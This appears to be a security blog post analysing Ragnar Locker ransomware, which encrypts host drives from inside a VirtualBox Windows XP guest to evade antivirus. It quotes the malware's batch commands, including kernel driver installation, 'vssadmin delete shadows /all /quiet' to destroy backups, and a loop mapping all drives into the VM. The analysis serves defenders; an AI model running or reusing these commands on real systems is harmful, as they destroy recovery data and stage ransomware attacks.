A new Ransomware has recently been found that infects a machine in a different way. The Ransomware is called “Ragnar locker”. Instead of attempting to infect the machine directly, it manages to set up a virtual machine with Windows XP installed, then sets up drive mappings to the host machine, then starts encrypting from inside the virtual machine, which avoids detection from the host machine’s antivirus software.
The Ransomware uses a strategy called “Living off the Land”, which means that legitimate software administration tools which exist on the network are used to infect a machine. In this case, the malware uses a group policy object to download an MSI file, which contains a copy of VirtualBox with Windows XP installed, with a Ragnar locker executable inside.
VirtualBox add-ons allows files to be shared with the guest, which also allows the local disk, removable storage, and mapped network drives on the host machine accessible to the guest virtual machine. Once the drives are mapped in the virtual machine, the ransomware can then proceed to encrypt any file on those drives without being detected by the host machines antivirus.
Here is how the virtual machine is installed on the host machine.
The VirtualBox software is copied to C:\Program files [x86]\virtual appliances
The MSI file also deploys an executable called va.exe, a batch file: install.bat, and a few support files. Once installation is done, va.exe is run, which also runs the batch script. The script will then run VBoxC.dll and VBoxRT.dll, and the VirtualBox driver VboxDrv.sys.
regsvr32 /S “%binpath%\VboxC.dll”
sc create VBoxDRV binpath= “%binpath%\drivers\VboxDrv.sys” type= kernel start= auto error= normal displayname= PortableVBoxDRV
sc start VBoxDRV
The script will then stop the Windows shell Hardware detection, this is so the Windows Autoplay notification functionality is disabled:
sc stop ShellHWDetection
It then proceeds to delete the PC’s volume shadow copies, so earlier unencrypted versions of the files can’t be restored:
vssadmin delete shadows /all /quiet
The install.bat script enumerates all the local disks, mapped drives, and removable storage on the physical machine, so that they are accessible from within the virtual machine.
mountvol | find “}\” > v.txt (For /F %%i In (v.txt) Do ( Set freedrive=0 FOR %%d IN (C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO ( IF NOT EXIST %%d:\ ( IF “!freedrive!”==”0” ( Set freedrive=%%d ) ) ) mountvol !freedrive!: %%i ping -n 2 127.0.0.1 )) Set driveid=0 FOR %%d IN (C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO ( IF EXIST %%d:\ ( Set /a driveid+=1 echo ^<SharedFolder name=”!driveid!” hostPath=”%%d:\” writable=”true”/^> >>sf.txt ) )
Then, the virtual machine is started with this command:
“%binpath%\VboxHeadless.exe” –startvm micro -v off
The Windows XP virtual machine itself is kept in a file called micro.vdi, and the ransomware is found on c:\vrun.exe. The ransomware is then started by running a batch file called vrun.bat which is located in C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\. The script then proceeds to mount the shared drives in the virtual machine, which means the ransomware now has full access to the hosts local disks and network drives.
Vrun.exe is then executed, encrypting the data, and then finally shows the ransom message, which looks like the below:
To prevent being infected by this ransomware, always be vigilant of email attachments and links from unknown and suspicious addresses. When downloading software, always make sure it is from official trustworthy websites. Always keep your machine up to date with the latest patches, and make sure to keep offline backups of any important data, just in case an event like this were to occur.